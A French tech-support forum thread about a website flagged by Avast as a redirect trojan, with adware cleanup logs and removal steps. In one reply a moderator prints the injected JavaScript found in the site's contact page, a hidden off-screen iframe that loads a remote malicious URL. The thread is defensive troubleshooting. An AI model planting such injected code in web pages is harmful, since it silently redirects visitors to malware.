HTML :RedirME-inf [Trj] - Site internet bloque par avast

Résolu
GIANNINNO Messages postés 39 Date d'inscription   Statut Membre Dernière intervention   -  
juju666 Messages postés 35446 Date d'inscription   Statut Contributeur sécurité Dernière intervention   -
J'ai un site internet conçu par un professionnel il y a 4 ans. Alors que je n'ai jamais eu de soucis, depuis 3 mois mon antivirus avast (version gratuite) me bloque l'accès à mon site en tant que simple internaute pour la raison de menace suivante :
Objet : c:\Users\....\AppData\...\2551 I {gzip}
infection : HTML :RedirME-inf [Trj]
Action : Bloqué
Processus : C:\Program Files\...\firefox.exe
Mon PC de consultation du site et également mon PC avec lequel je mets à jour ce même site. Pour information, lorsque je me connecte à partir de postes équivalents (PC windows 7) mais équipés soit du logiciel Avira, soit AGV, je n'ai aucun problème.
J'ai réalisé plusieurs nettoyages de mon PC avec CCleaner et Malwarebytes, mais je n'arrive pas à traiter mon problème.
Quelqu'un peut il m'aider?
merci
A voir également:

24 réponses

  • 1
  • 2
Réponse 1 / 24
Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 685
 
Salut,

Tu as installé des adwares et programmes parasites sur ton PC qui ouvrent des publicités et ralentissent l'ordinateur et les navigateurs WEB.
Voici la procédure à suivre pour les supprimer :

Commence par ceci :

Suis le tutorial AdwCleaner https://www.malekal.com/adwcleaner-supprimer-virus-adwares-pup/?t=33839&start= ( d'Xplode )
Télécharge le sur ton bureau ou dossier de téléchargement.
Lance AdwCleaner, clique sur [Scanner].
L'analyse peux durer plusieurs minutes, patiente.
Une fois le scan terminé, ne décoche rien, clique sur [Nettoyer]

Une fois le nettoyage terminé, un rapport s'ouvrira. Copie/colle le contenu du rapport dans ta prochaine réponse par un copier/coller.
Si cela ne fonctionne pas, utilise le site http://pjjoint.malekal.com pour héberger le rapport, donne le lien du rapport dans un nouveau message.

Note : Le rapport est également sauvegardé sous C:\AdwCleaner[S1].txt


puis :

Suis ce tutoriel FRST: https://www.malekal.com/tutoriel-farbar-recovery-scan-tool-frst/
Cela va générer trois rapports FRST :
* FRST.txt
* Shortcut.txt
* Additionnal.txt

Envoie comme expliqué, ces trois rapports sur le site pjjoint et donne les trois liens pjjoint de ces rapports afin qu'ils puissent être consultés.

1
Réponse 2 / 24
GIANNINNO Messages postés 39 Date d'inscription   Statut Membre Dernière intervention  
 
Merci,
peux tu me confirmer que le fichier suivant que je viens de télécharger "FileOpenerSetup" est celui dont tu parles? car lors de son lancement il ne s'agit ce n'est pas Adwcleaner qui apparait, mais de pcspeedmaximizeer qui me propose de réparer windows ?
peux tu me confirmer pour que je ne m'engage pas dans des problèmes?
merci
0
Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 685
 
nan là tu as cliqué sur un pub et tu vas installer d'autres adwares.
Le lien de téléchargement adwcleaner est donné dans le texte du tutorial.
0
Réponse 3 / 24
GIANNINNO Messages postés 39 Date d'inscription   Statut Membre Dernière intervention  
 
ok, c'est ce que je pensais,
je suis sur la bonne route à nouveau et entrain de scanner
0
Réponse 4 / 24
GIANNINNO Messages postés 39 Date d'inscription   Statut Membre Dernière intervention  
 
voici le rapport de scan de AdwCleaner, quant aux trois autres (Addition+FRST+Shortcut) je t'ai envoyé leur trois liens par mail (dis moi s'il faut que je te mettes ces liens sur le forum directement)?




***** [ Fichiers / Dossiers ] *****

Dossier Supprimé : C:\ProgramData\apn
Dossier Supprimé : C:\ProgramData\Babylon
Dossier Supprimé : C:\ProgramData\Tarma Installer
Dossier Supprimé : C:\ProgramData\Allmyapps
Dossier Supprimé : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FileOpener
Dossier Supprimé : C:\Program Files\PC Speed Maximizer
Dossier Supprimé : C:\Program Files\predm
Dossier Supprimé : C:\Program Files\RegClean Pro
Dossier Supprimé : C:\Program Files\rightsurf
Dossier Supprimé : C:\Program Files\Systweak Support Dock
Dossier Supprimé : C:\Program Files\Tweaks
Dossier Supprimé : C:\Program Files\WSE_Vosteran
Dossier Supprimé : C:\Program Files\Software
Dossier Supprimé : C:\Users\l-eau\AppData\Local\FileTypeAssistant
Dossier Supprimé : C:\Users\l-eau\AppData\Local\lollipop
Dossier Supprimé : C:\Users\l-eau\AppData\Local\CrashRpt
Dossier Supprimé : C:\Users\l-eau\AppData\Local\Software
Dossier Supprimé : C:\Users\l-eau\AppData\LocalLow\Delta
Dossier Supprimé : C:\Users\l-eau\AppData\Roaming\Babylon
Dossier Supprimé : C:\Users\l-eau\AppData\Roaming\DigitalSites
Dossier Supprimé : C:\Users\l-eau\AppData\Roaming\OfferBox
Dossier Supprimé : C:\Users\l-eau\AppData\Roaming\Systweak
Dossier Supprimé : C:\Users\l-eau\AppData\Roaming\Allmyapps
Dossier Supprimé : C:\Users\l-eau\AppData\Roaming\WSE_Vosteran
Fichier Supprimé : C:\END
Fichier Supprimé : C:\Users\Public\Desktop\FileOpener.lnk
Fichier Supprimé : C:\Windows\system32\roboot.exe
Fichier Supprimé : C:\Users\l-eau\AppData\Roaming\Mozilla\Firefox\Profiles\xnlx9p4t.default-1393440752245\invalidprefs.js
Fichier Supprimé : C:\Users\l-eau\AppData\Roaming\Mozilla\Firefox\Profiles\xnlx9p4t.default-1393440752245\user.js
Fichier Supprimé : C:\Users\l-eau\AppData\Roaming\Mozilla\Firefox\Profiles\xnlx9p4t.default-1393440752245\searchplugins\Vosteran.xml

***** [ Tâches planifiées ] *****

Tâche Supprimée : Digital Sites
Tâche Supprimée : WSE_Vosteran

***** [ Raccourcis ] *****


***** [ Registre ] *****

Clé Supprimée : HKLM\SOFTWARE\Classes\AlxSSB.AlxTBSSB
Clé Supprimée : HKLM\SOFTWARE\Classes\AlxSSB.AlxTBSSB.1
Clé Supprimée : HKLM\SOFTWARE\Classes\AppID\esrv.EXE
Clé Supprimée : HKLM\SOFTWARE\Classes\Prod.cap
Clé Supprimée : HKCU\Software\5e53dd88b138ee47
Clé Supprimée : HKLM\SOFTWARE\Classes\AppID\{1F02FB61-2BE5-4C16-8199-AEAA16EB0342}
Clé Supprimée : HKLM\SOFTWARE\Classes\AppID\{C292AD0A-C11F-479B-B8DB-743E72D283B0}
Clé Supprimée : HKLM\SOFTWARE\Classes\AppID\{9CB2CD61-FFA0-406C-9D2D-8FDE6F4A4D8A}
Clé Supprimée : HKLM\SOFTWARE\Classes\CLSID\{02054E11-5113-4BE3-8153-AA8DFB5D3761}
Clé Supprimée : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
Clé Supprimée : HKLM\SOFTWARE\Classes\CLSID\{80922EE0-8A76-46AE-95D5-BD3C3FE0708D}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{021B4049-F57D-4565-A693-FD3B04786BFA}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{0362AA09-808D-48E9-B360-FB51A8CBCE09}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{06844020-CD0B-3D3D-A7FE-371153013E49}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{0ADC01BB-303B-3F8E-93DA-12C140E85460}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{10D3722F-23E6-3901-B6C1-FF6567121920}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{1675E62B-F911-3B7B-A046-EB57261212F3}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{192929F2-9273-3894-91B0-F54671C4C861}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{2932897E-3036-43D9-8A64-B06447992065}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{2DE92D29-A042-3C37-BFF8-07C7D8893EFA}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{32B80AD6-1214-45F4-994E-78A5D482C000}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{3A8E103F-B2B7-3BEF-B3B0-88E29B2420E4}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{431532BD-0AE1-4ABC-BE8C-919F3D1332E2}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{478CE5D3-D38E-3FFE-8DBE-8C4A0F1C4D8D}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{48B7DA4E-69ED-39E3-BAD5-3E3EFF22CFB0}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{5982F405-44E4-3BBB-BAC4-CF8141CBBC5C}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{5D8C3CC3-3C05-38A1-B244-924A23115FE9}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{641593AF-D9FD-30F7-B783-36E16F7A2E08}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{711FC48A-1356-3932-94D8-A8B733DBC7E4}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{72227B7F-1F02-3560-95F5-592E68BACC0C}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{7B5E8CE3-4722-4C0E-A236-A6FF731BEF37}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{890D4F59-5ED0-3CB4-8E0E-74A5A86E7ED0}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{8C68913C-AC3C-4494-8B9C-984D87C85003}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{8D019513-083F-4AA5-933F-7D43A6DA82C4}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{923F6FB8-A390-370E-A0D2-DD505432481D}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{9BBB26EF-B178-35D6-9D3D-B485F4279FE5}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{A62DDBE0-8D2A-339A-B089-8CBCC5CD322A}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{A82AD04D-0B8E-3A49-947B-6A69A8A9C96D}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{ADEB3CC9-A05D-4FCC-BD09-9025456AA3EA}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{B06D4521-D09C-3F41-8E39-9D784CCA2A75}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{C06DAD42-6F39-4CE1-83CC-9A8B9105E556}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{C2E799D0-43A5-3477-8A98-FC5F3677F35C}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{D16107CD-2AD5-46A8-BA59-303B7C32C500}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{D25B101F-8188-3B43-9D85-201F372BC205}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{D2BA7595-5E44-3F1E-880F-03B3139FA5ED}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{D35F5C81-17D9-3E1C-A1FC-4472542E1D25}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{D8FA96CA-B250-312C-AF34-4FF1DD72589D}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{DAFC1E63-3359-416D-9BC2-E7DCA6F7B0F3}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{DC5E5C44-80FD-3697-9E65-9F286D92F3E7}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{E1B4C9DE-D741-385F-981E-6745FACE6F01}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{E7B623F5-9715-3F9F-A671-D1485A39F8A2}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{ED916A7B-7C68-3198-B87D-2DABC30A5587}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{EFA1BDB2-BB3D-3D9A-8EB5-D0D22E0F64F4}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{F4CBF4DD-F8FE-35BA-BB7E-68304DAAB70B}
Clé Supprimée : HKLM\SOFTWARE\Classes\Interface\{FC32005D-E27C-32E0-ADFA-152F598B75E7}
Clé Supprimée : HKLM\SOFTWARE\Classes\TypeLib\{095BFD3C-4602-4FE1-96F1-AEFAFBFD067D}
Clé Supprimée : HKLM\SOFTWARE\Classes\TypeLib\{2BF2028E-3F3C-4C05-AB45-B2F1DCFE0759}
Clé Supprimée : HKLM\SOFTWARE\Classes\TypeLib\{C292AD0A-C11F-479B-B8DB-743E72D283B0}
Clé Supprimée : HKLM\SOFTWARE\Classes\TypeLib\{DA9FC525-41ED-4C00-B046-946DA7CDD305}
Clé Supprimée : HKLM\SOFTWARE\Classes\TypeLib\{DB538320-D3C5-433C-BCA9-C4081A054FCF}
Clé Supprimée : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{A4C2FB10-84C3-44EB-9F9E-860FA1D9A797}
Clé Supprimée : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DF7770F7-832F-4BDF-B144-100EDDD0C3AE}
Clé Supprimée : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FBCBC43A-DCA9-4192-A4C8-B57FD0F77D4D}
Clé Supprimée : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E57091A7-B5F0-4C42-9329-72ED3E59ED31}
Clé Supprimée : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{43C65AA8-D8F0-4A19-8BD5-62213448C46A}
Clé Supprimée : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{9CB96984-43C3-4D44-90EF-01466EFCF7BB}
Clé Supprimée : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9CB96984-43C3-4D44-90EF-01466EFCF7BB}
Clé Supprimée : HKCU\Software\Alexa Internet
Clé Supprimée : HKCU\Software\APN PIP
Clé Supprimée : HKCU\Software\BABSOLUTION
Clé Supprimée : HKCU\Software\Bitberry Software
Clé Supprimée : HKCU\Software\Bitberry
Clé Supprimée : HKCU\Software\Boxore
Clé Supprimée : HKCU\Software\Conduit
Clé Supprimée : HKCU\Software\distromatic
Clé Supprimée : HKCU\Software\InstallCore
Clé Supprimée : HKCU\Software\lollipop
Clé Supprimée : HKCU\Software\Offerbox
Clé Supprimée : HKCU\Software\systweak
Clé Supprimée : HKCU\Software\Tutorials
Clé Supprimée : HKCU\Software\YahooPartnerToolbar
Clé Supprimée : HKCU\Software\WSE_Vosteran
Clé Supprimée : HKCU\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Clé Supprimée : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Clé Supprimée : HKLM\SOFTWARE\{6791A2F3-FC80-475C-A002-C014AF797E9C}
Clé Supprimée : HKLM\SOFTWARE\Babylon
Clé Supprimée : HKLM\SOFTWARE\InstallCore
Clé Supprimée : HKLM\SOFTWARE\Offerbox
Clé Supprimée : HKLM\SOFTWARE\PIP
Clé Supprimée : HKLM\SOFTWARE\systweak
Clé Supprimée : HKLM\SOFTWARE\Tarma Installer
Clé Supprimée : HKLM\SOFTWARE\Tutorials
Clé Supprimée : HKLM\SOFTWARE\Vittalia
Clé Supprimée : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\File Opener Packages
Clé Supprimée : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SearchTheWebARP
Clé Supprimée : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Tweaks FileOpener
Clé Supprimée : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WSE_Vosteran
Clé Supprimée : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SpyHunter
Clé Supprimée : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0238BBE24EA3A70408B81E4BB89C15E5
Clé Supprimée : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\29799DE249E7DBC459FC6C8F07EB8375
Clé Supprimée : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\43C098337DB065A49B665D4EA7F16D1C
Clé Supprimée : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A71991503412AEB42838B02C5ED9F9CD
Clé Supprimée : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\CA0054A5AB3EFFE4CB5660E44A1E7DCC
Clé Supprimée : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F7652513C62FF63448CFF05163719DB7
Clé Supprimée : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SoftwareUpdate.exe

***** [ Navigateurs ] *****

-\\ Internet Explorer v0.0.0.0

Paramètre Restauré : HKCU\Software\Microsoft\Internet Explorer\Main [Search Page]

-\\ Mozilla Firefox v34.0.5 (x86 fr)

[xnlx9p4t.default-1393440752245\prefs.js] - Ligne Supprimée : user_pref("browser.search.defaultenginename", "Vosteran");
[xnlx9p4t.default-1393440752245\prefs.js] - Ligne Supprimée : user_pref("browser.search.selectedEngine", "Vosteran");
[xnlx9p4t.default-1393440752245\prefs.js] - Ligne Supprimée : user_pref("browser.startup.homepage", "hxxp://vosteran.com/?f=1&a=vst_ggfc_15_03_ff&cd=2XzuyEtN2Y1L1Qzu0FtDyE0D0AtB0B0B0CtA0ByDyDyEtByCtN0D0Tzu0StCtCtDyBtN1L2XzutAtFyBtFtCtFtBtN1L1CzutCyEtBzytDyD1V1Bt[...]
[xnlx9p4t.default-1393440752245\prefs.js] - Ligne Supprimée : user_pref("extensions.srchvstrn.hmpgUrl", "hxxp://vosteran.com/?f=1&a=vst_ggfc_15_03_ff&cd=2XzuyEtN2Y1L1Qzu0FtDyE0D0AtB0B0B0CtA0ByDyDyEtByCtN0D0Tzu0StCtCtDyBtN1L2XzutAtFyBtFtCtFtBtN1L1CzutCyEtBzytDyD1[...]
[xnlx9p4t.default-1393440752245\prefs.js] - Ligne Supprimée : user_pref("extensions.srchvstrn.newTabUrl", "hxxp://vosteran.com/?f=2&a=vst_ggfc_15_03_ff&cd=2XzuyEtN2Y1L1Qzu0FtDyE0D0AtB0B0B0CtA0ByDyDyEtByCtN0D0Tzu0StCtCtDyBtN1L2XzutAtFyBtFtCtFtBtN1L1CzutCyEtBzytDy[...]
[xnlx9p4t.default-1393440752245\prefs.js] - Ligne Supprimée : user_pref("extensions.srchvstrn.prtnrId", "WSE_Vosteran");
[xnlx9p4t.default-1393440752245\prefs.js] - Ligne Supprimée : user_pref("extensions.srchvstrn.srchPrvdr", "Vosteran");
[xnlx9p4t.default-1393440752245\prefs.js] - Ligne Supprimée : user_pref("extensions.srchvstrn.tlbrSrchUrl", "hxxp://vosteran.com/?f=3&a=vst_ggfc_15_03_ff&cd=2XzuyEtN2Y1L1Qzu0FtDyE0D0AtB0B0B0CtA0ByDyDyEtByCtN0D0Tzu0StCtCtDyBtN1L2XzutAtFyBtFtCtFtBtN1L1CzutCyEtBzyt[...]

*************************

AdwCleaner[R0].txt - [12672 octets] - [12/01/2015 18:42:25]
AdwCleaner[S0].txt - [12658 octets] - [12/01/2015 18:45:40]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [12719 octets] ##########
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
Réponse 5 / 24
Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 685
 
ok, passe à FRST :)
0
Réponse 6 / 24
GIANNINNO Messages postés 39 Date d'inscription   Statut Membre Dernière intervention  
 
bonsoir,
à ta réponse où tu me demandes le fichier FRST, il semble que tu n'es pas eu mon dernier message. je t'es transmis en effet les liens des 3 rapports comme tu le demandes:

FRST : https://pjjoint.malekal.com/files.php?id=20150112_i11i6p11d1011
ADDITION : https://pjjoint.malekal.com/files.php?id=20150112_n5t6d9x12d9
Shortcut: https://pjjoint.malekal.com/files.php?id=20150112_h15q815n14n9

Encore merci de ton aide, que faut il que je fasse maintenant?
0
Réponse 7 / 24
Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 685
 
ca a l'air bon,

Désinstalle Spyhunter, sert à rien.
0
Réponse 8 / 24
GIANNINNO Messages postés 39 Date d'inscription   Statut Membre Dernière intervention  
 
SUPER
J'ai 2 petites questions pour finir :
1. Comment désinstaller SpyHunter proprement puisque je ne le trouve pas sur le panneau de configuration ? Il se trouve à l'emplacement suivant : programme > Enigma Software Group > SpyHunter.
2. Toute la procédure que tu m'as indiquée peut elle être appliquée de la même façon sur mon autre portable (qui est installé avec les mêmes logiciels et windows 7) ?
Encore Mille fois merci, cela faisait 3 jours que je cherchais à m'en sortir !!!!
0
Réponse 9 / 24
Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 685
 
Tu peux utiliser la procédure sur un autre ordinateur, si tu as des pubs dessus.

Pour Spyhunter :


Télécharge Combofix sUBs sur ton bureau : http://download.bleepingcomputer.com/sUBs/ComboFix.exe et sauvegarde le sur ton bureau et pas ailleurs!

DESACTIVE LA PROTECTION ANTIVIR DURANT LA PROCEDURE

Crée un nouveau document texte : clic droit de souris sur le bureau > Nouveau > Document Texte, et copie dedans les lignes suivantes :

driver::
SpyHunter 4 Service
esgiguard
EsgScanner
file::
C:\WINDOWS\system32\Drivers\EsgScanner.sys
folder::
C:\Users\Virginie\AppData\Roaming\Enigma Software Group
C:\Program Files\Enigma Software Group
C:\Windows\System32\Tasks\SpyHunter4Startup
file::
C:\WINDOWS\System32\Tasks\SpyHunter4Startup
C:\Users\l-eau\Desktop\SpyHunter.lnk
C:\Users\l-eau\AppData\Roaming\Enigma Software Group
C:\Users\l-eau\Desktop\SpyHunter.lnk




Enregistre ce fichier sous le nom CFScript

[*]Fait un glisser/déposer de ce fichier CFScript sur le fichier ComboFix.exe

[*]Combofix se lance, laisse toi guider..

[*]Patiente le temps du scan. Le bureau va disparaître à plusieurs reprises: c'est normal!
Ne touche à rien tant que le scan n'est pas terminé.
[*]Une fois le scan achevé, un rapport va s'afficher: poste son contenu sur http://pjjoint.malekal.com/ et donne le lien ici dans un nouveau message.


0
gianninno
 
Bonjour,
j'ai eu un petit soucis cette nuit lors de la désinstallation de spyhunter.
j'ai suivi ta procédure après avoir bloqué l'antivirus AVG... pour ensuite faire comme convenu un glisser/déposer du fichier CFScript sur le fichier ComboFix.exe.

je n'ai touché à rien tant que le scan n'était pas terminé mais malheureusement lors de l'exécution, spyhunter s'est lancé automatiquement (à moins qu'il travaillait déjà en silence sans que cela ne puisse se voir).

le pc s'est bloqué, idem pour l'écran, j'ai attendu 45 mn pour suivre ta consigne mais plus rien ne bougeait même en agissant avec le gestionnaire de tache de windows qui ne réagissait pas.
j'ai finalement repris la main en coupant l'alimentation pour tout relancer.

depuis impossible de relancer la procédure avec combofix et spyhunter est toujours en fonction comme avant.
quoi faire à ce stade?
merci de m'éclairer, je suis sans solution.
0
Réponse 10 / 24
GIANNINNO Messages postés 39 Date d'inscription   Statut Membre Dernière intervention  
 
salut,
j'ai eu un petit soucis cette nuit lors de la désinstallation de spyhunter.
j'ai suivi ta procédure après avoir bloqué l'antivirus AVG... pour ensuite faire comme convenu un glisser/déposer du fichier CFScript sur le fichier ComboFix.exe.

je n'ai touché à rien tant que le scan n'était pas terminé mais malheureusement lors de l'exécution, spyhunter s'est lancé automatiquement (à moins qu'il travaillait déjà en silence sans que cela ne puisse se voir).

le pc s'est bloqué, idem pour l'écran, j'ai attendu 45 mn pour suivre ta consigne mais plus rien ne bougeait même en agissant avec le gestionnaire de tache de windows qui ne réagissait pas.
j'ai finalement repris la main en coupant l'alimentation pour tout relancer.

depuis impossible de relancer la procédure avec combofix et spyhunter est toujours en fonction comme avant.
quoi faire à ce stade?
merci de m'éclairer, je suis sans solution.
0
Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 685
 
Quelqu'un va prendre la relève pour la partie Spyhunter pour le supprimer avec ZHPDiag.
Patiente :)
0
Réponse 11 / 24
GIANNINNO Messages postés 39 Date d'inscription   Statut Membre Dernière intervention  
 
merci de ton aide, ton aide à été précieuse pour éradiquer tous ces cookies polluants.
je suis dans la panade pour ce qui de spyhunter (qui sur ce point ne m'a rien apporté)
je suis preneur d'un secours pour la partie notamment pour sa suppression avec ZHPDiag.
merci
0
Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 685
 
Tu peux essayer ce programme : https://forum.malekal.com/viewtopic.php?t=48954&start=

Fais réparer et donne le rapport ici.
0
Réponse 12 / 24
GIANNINNO Messages postés 39 Date d'inscription   Statut Membre Dernière intervention  
 
Bonsoir Malekal,

je pensais avoir résolu mon problème après avoir éradiqué les virus et malware avec ton aide.
malheureusement des amis mon signalés que mon site était toujours bloqué par avast.

je ne comprends pas d'autant qu'après toute la procédure ci dessous que l'on a conduite ensemble, j'ai filtré les fichiers du site au travers du logiciel avast (logiciel installé sur mon poste) ainsi qu'avec avira et avg installés sur d'autres postes...

je ne comprends plus, ce n'est pas logique qu'avast trouve encore à bloquer le site alors qu'il en a nettoyé l'ensemble des fichiers avant qu'ils soient transférés sur le site.

toujours la même infection : HTML :RedirME-inf [Trj]
Processus : C:\Program Files\...\firefox.exe

ci joint le message d'avast


ci joint la liste des malwares supprimés par avast avant transfert des fichiers sur le site


Quelqu'un peut il m'aider?
merci
0
juju666 Messages postés 35446 Date d'inscription   Statut Contributeur sécurité Dernière intervention   4 796
 
Salut,

Le meilleur serait à mon avis que tu ouvres fichier par fichier pour les nettoyer manuellement.
0
GIANNINNO Messages postés 39 Date d'inscription   Statut Membre Dernière intervention   > juju666 Messages postés 35446 Date d'inscription   Statut Contributeur sécurité Dernière intervention  
 
j'ai 997 fichiers...
je suis infoutu de rentrer dans l'écriture des codes de fichiers et donc cela me parait être énorme comme travail? isn't il?
0
Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 685
 
Quel est le site en question ?
Tu peux donner un des fichiers modifiés ?
zip le et envoie sur spamhere-@wanadoo.fr
0
Réponse 13 / 24
Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 685
 
bon alors,

Au vu des emplacements, notamment le script dans images, ce sont probablement des pages contenants des scripts malicieux pour rediriger des internautes vers des malwares.

vite fait dans les sauvegardes, il y a aussi ce code malicieux dans la page de contact :



pour le contact - ça donne : 
<script>
var _q = document.createElement('iframe'),
    _n = 'setAttribute';
_q[_n]('src', 'http://www.localwebgeek.com/wp-feeds.php');
_q.style.position = 'absolute';
_q.style.width = '16px';
_q[_n]('frameborder', navigator.userAgent.indexOf('d0a7a142b755172da72ff74a1ac25199') + 1);
_q.style.left = '-5597px';
document.write('<div id=\'__dradv\'></div>');
document.getElementById('__dradv').appendChild(_q);
</script>


default.php : http://ddecode.com/phpdecoder/?results=99c033d2af4652b6ea2d23092b473492
Cela provoque des redirections.

Pour contact, du code malicieux qui date de 2012 : http://www.htmlforums.com/archive/index.php/t-148431.html
ce qui est très très vieux.

C'est difficile de savoir si les pages sont comme ça depuis longtemps ou si le code a été modifié récemment, ça me paraît bizarre, car vu comment c'est vieux, Avast! aurait surement détecté le malware qui provoque ces modifications.
Peut-être que les sauvegardes sont passées sur un PC infecté à un moment donné et que tu as tout mis en ligne.

A lire : https://forum.malekal.com/viewtopic.php?t=22837&start=

Sinon le site a été piraté à distance.

~~

Dans le doute, tu peux faire un scan NOD32 sur ton PC: https://www.malekal.com/scan-antivirus-ligne-nod32/#NOD32
Enregistre le rapport et donne le ici.
Je doute qu'il trouve grand chose.



Peut-être que tu devrais supprimer et repartir sur une sauvegarde saine si tu en as une.
Sinon faut tout nettoyer à la main.

Like the angel you are, you laugh creating a lightness in my chest,
Your eyes they penetrate me,
(Your answer's always 'maybe')
That's when I got up and left
0
Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 685
 
le default.php ça va sur mgt365.com
mais on trouve pas grand chose dessus.
0
Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 685
 
default.php a l'air en ligne, c'est mal.
0
Réponse 14 / 24
GIANNINNO Messages postés 39 Date d'inscription   Statut Membre Dernière intervention  
 
bravo tu as dû sans doute voir juste, puisque mes premiers problèmes d'infection de site date de 2012, personne n'avait réussi alors à repérer la cause et on se contentait de changer le fichier index... quelques mois plus tard et ça se reproduisait .... mais aujourd'hui le site se bloque carrément.

pour ce qui est des fichiers infectés, je les ai supprimés du site mais je les ai par ailleurs conservés. j'ai cherché à te les envoyer mais je n'y parviens pas, leur envoi est systématiquement bloqué pour cause de virus.

comment puis je te les faire parvenir si cela peut t'aider

en attendant je vais appliquer le scan que tu recommandes.
0
Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 685
 
chez moi, il fonctionne bien.
0
GIANNINNO Messages postés 39 Date d'inscription   Statut Membre Dernière intervention   > Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention  
 
Tu veux parler du site???
c'est impossible, j'ai envoyé à un tas de gens le lien du site pour les voeux.
tous ceux qui ont avast comme antivirus m'ont prévenu qu'ils ne peuvent avoir accès au site car il comporte des virus !!!
0
GIANNINNO Messages postés 39 Date d'inscription   Statut Membre Dernière intervention   > Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention  
 
